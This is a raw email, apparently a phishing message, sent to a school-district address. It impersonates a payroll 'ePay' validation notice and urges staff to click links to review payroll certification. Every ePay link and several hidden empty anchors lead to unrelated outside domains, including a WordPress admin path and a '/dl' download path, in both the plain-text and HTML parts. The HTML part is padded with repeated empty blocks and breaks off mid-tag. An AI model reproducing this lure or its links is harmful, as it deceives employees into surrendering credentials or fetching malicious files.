From: "Wall, Meredith M." <Meredith.Wall@spartanburg2.k12.sc.us>
To: "Wall, Meredith M." <Meredith.Wall@spartanburg2.k12.sc.us>
Subject: RE: HR payroll area for assistance
Thread-Topic: HR payroll area for assistance
Thread-Index: AdQDIavv8o7RqYmHQkO5c4Am0L3shgACF01BAABP1YcAAGdiwAAAE2Gr
Date: Wed, 13 Jun 2018 15:46:51 +0000
Message-ID: <99916FBC9AD6D14A9C555AFB6275AC26201FC547@EXCHANGE1.district2.com>
References: <99916FBC9AD6D14A9C555AFB6275AC26201EE231@EXCHANGE1.district2.com>,<99916FBC9AD6D14A9C555AFB6275AC26201F98DB@EXCHANGE1.district2.com>
In-Reply-To: <99916FBC9AD6D14A9C555AFB6275AC26201F98DB@EXCHANGE1.district2.com>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
x-originating-ip: [69.88.134.137]
Content-Type: multipart/alternative;
	boundary="_000_99916FBC9AD6D14A9C555AFB6275AC26201FC547EXCHANGE1distri_"
MIME-Version: 1.0
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 519

--_000_99916FBC9AD6D14A9C555AFB6275AC26201FC547EXCHANGE1distri_
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






Guidelines for Validating Employee Pays.

You can now VALIDATE the payroll for 015367 (June) for On Cycle

Please click ePay<https://alumidecor.com/6tj><https://thetopphoneaccessorie=
s.com/wp-admin/css/colors/ocean/color/><https://zaikerekjryz-france.com/nn/=
><https://zaikerekjryz-france.com/nn/><https://web-vidiajmfdyer.com/dl> to =
review the payroll certification information for you.

Payroll certification information can be viewed from the ePay menu item, Em=
ployee Data Management > Payroll Results > Certify Payroll after you have l=
ogged onto epay<https://alumidecor.com/6tj><https://thetopphoneaccessories.=
com/wp-admin/css/colors/ocean/color/><https://zaikerekjryz-france.com/nn/><=
https://zaikerekjryz-france.com/nn/><https://web-vidiajmfdyer.com/dl>

Summary Pay Results Tab

  *   Check that employees are receiving the correct payments including all=
owances. Click on the note pad icon to view an employee's Allowances and De=
ductions.
Note: Access to view Deductions will be available only to some managers.

Further Assistance

The Department has Interactive Help Programs and Guides to assist with the =
certification process, running reports and managing employee leave.

This is a system generated email. Please do not reply to this email.




















































--_000_99916FBC9AD6D14A9C555AFB6275AC26201FC547EXCHANGE1distri_
Content-Type: text/html; charset="iso-8859-1"
Content-ID: <C6374D1743E97943A4CB9964DC861650@spartanburg2.k12.sc.us>
Content-Transfer-Encoding: quoted-printable

<html dir=3D"ltr">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859-=
1">
<style>P {
	MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px
}
</style><style>P {
	MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px
}
</style><style id=3D"owaParaStyle">P {
	MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px
}
</style>
</head>
<body ocsi=3D"0" fPStyle=3D"1">
<div style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Tahoma; COLOR: #000000; DIRECTI=
ON: ltr">
<p>&nbsp;</p>
<div id=3D"divRpF109" style=3D"DIRECTION: ltr"><font color=3D"#000000" size=
=3D"2" face=3D"Tahoma"><br>
</font><br>
&nbsp;</div>
<div></div>
<div>
<div style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Tahoma; COLOR: #000000; DIRECTI=
ON: ltr">
<div id=3D"divtagdefaultwrapper" style=3D"FONT-SIZE: 16px; FONT-FAMILY: Cal=
ibri,Helvetica,sans-serif,EmojiFont,&quot;Apple Color Emoji&quot;,&quot;Seg=
oe UI Emoji&quot;,NotoColorEmoji,&quot;Segoe UI Symbol&quot;,&quot;Android =
Emoji&quot;,EmojiSymbols; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRAN=
SFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHA=
NS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255=
); TEXT-INDENT: 0px" dir=3D"ltr">
<p style=3D"FONT-SIZE: 12pt; MARGIN-BOTTOM: 0px; FONT-FAMILY: Calibri,Helve=
tica,sans-serif,EmojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoj=
i&quot;,NotoColorEmoji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot=
;,EmojiSymbols; MARGIN-TOP: 0px; COLOR: rgb(0,0,0)">
<b style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(255,0,0)">Guid=
elines for Validating Employee Pays.</b><br style=3D"FONT-SIZE: small; FONT=
-FAMILY: Arial">
<br style=3D"FONT-SIZE: small; FONT-FAMILY: Arial">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial">You can now<span class=
=3D"Apple-converted-space">&nbsp;</span></span><b style=3D"FONT-SIZE: small=
; FONT-FAMILY: Arial">VALIDATE</b><span style=3D"FONT-SIZE: small; FONT-FAM=
ILY: Arial"><span class=3D"Apple-converted-space">&nbsp;</span>the
 payroll for 015367 (June) for On Cycle</span><br style=3D"FONT-SIZE: small=
; FONT-FAMILY: Arial">
<br style=3D"FONT-SIZE: small; FONT-FAMILY: Arial">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial">Please click<span clas=
s=3D"Apple-converted-space">&nbsp;<b><a id=3D"LPlnk197548" class=3D"OWAAuto=
Link" href=3D"https://alumidecor.com/6tj" target=3D"_blank">ePay</a><a clas=
s=3D"OWAAutoLink" href=3D"https://thetopphoneaccessories.com/wp-admin/css/c=
olors/ocean/color/" target=3D"_blank"></a><a tabindex=3D"-1" id=3D"LPlnk280=
582" class=3D"OWAAutoLink" href=3D"https://zaikerekjryz-france.com/nn/" tar=
get=3D"_blank"></a></b><a tabindex=3D"-1" id=3D"LPlnk579492" class=3D"OWAAu=
toLink" href=3D"https://zaikerekjryz-france.com/nn/" target=3D"_blank"></a>=
<a tabindex=3D"-1" id=3D"LPlnk660872" class=3D"OWAAutoLink" href=3D"https:/=
/web-vidiajmfdyer.com/dl" target=3D"_blank"></a></span></span><span style=
=3D"FONT-SIZE: small; FONT-FAMILY: Arial"><span class=3D"Apple-converted-sp=
ace">&nbsp;</span>to
 review the payroll certification information for you.</span><br style=3D"F=
ONT-SIZE: small; FONT-FAMILY: Arial">
<br style=3D"FONT-SIZE: small; FONT-FAMILY: Arial">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial">Payroll certification =
information can be viewed from the ePay menu item, Employee Data Management=
 &gt; Payroll Results &gt; Certify Payroll after you have logged onto<span>=
&nbsp;</span><b><a id=3D"LPlnk24142" class=3D"OWAAutoLink" href=3D"https://=
alumidecor.com/6tj" target=3D"_blank">epay</a><a class=3D"OWAAutoLink" href=
=3D"https://thetopphoneaccessories.com/wp-admin/css/colors/ocean/color/" ta=
rget=3D"_blank"></a><a tabindex=3D"-1" id=3D"LPlnk44267" class=3D"OWAAutoLi=
nk" href=3D"https://zaikerekjryz-france.com/nn/" target=3D"_blank"></a></b>=
<a tabindex=3D"-1" id=3D"LPlnk127579" class=3D"OWAAutoLink" href=3D"https:/=
/zaikerekjryz-france.com/nn/" target=3D"_blank"></a><a tabindex=3D"-1" id=
=3D"LPlnk720551" class=3D"OWAAutoLink" href=3D"https://web-vidiajmfdyer.com=
/dl" target=3D"_blank"></a></span><br>
</p>
<b style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"><u>Sum=
mary Pay Results Tab</u></b><span style=3D"FONT-SIZE: small; FONT-FAMILY: A=
rial"></span>
<ul style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)" type=
=3D"disc">
<li>Check that employees are receiving the correct payments including allow=
ances. Click on the note pad icon to view an employee's Allowances and Dedu=
ctions.<span class=3D"Apple-converted-space">&nbsp;</span><br>
<b>Note:</b><span class=3D"Apple-converted-space">&nbsp;</span>Access to vi=
ew Deductions will be available only to some managers.</li></ul>
<b style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"><u>Fur=
ther Assistance</u></b><br style=3D"FONT-SIZE: small; FONT-FAMILY: Arial">
<br style=3D"FONT-SIZE: small; FONT-FAMILY: Arial">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)">The=
 Department has Interactive Help Programs and Guides to assist with the cer=
tification process, running reports and managing employee leave.&nbsp;</spa=
n></div>
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<br style=3D"FONT-SIZE: small; FONT-FAMILY: Arial">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)">Thi=
s is a system generated email. Please do not reply to this email.</span></d=
iv>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
